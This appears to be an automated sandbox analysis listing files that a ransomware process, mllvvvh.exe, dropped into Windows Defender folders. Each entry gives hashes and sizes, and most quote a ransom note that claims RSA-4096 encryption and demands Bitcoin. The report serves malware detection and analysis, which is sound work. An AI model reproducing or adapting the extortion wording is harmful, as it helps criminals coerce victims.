                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Updates\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Definition Updates\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Features\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Features\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Features\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\LocalCopy\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\LocalCopy\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\LocalCopy\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Network Inspection System\Support\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Network Inspection System\Support\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Network Inspection System\Support\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Network Inspection System\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Network Inspection System\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Network Inspection System\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Platform\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Platform\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Defender\Platform\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Quarantine\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
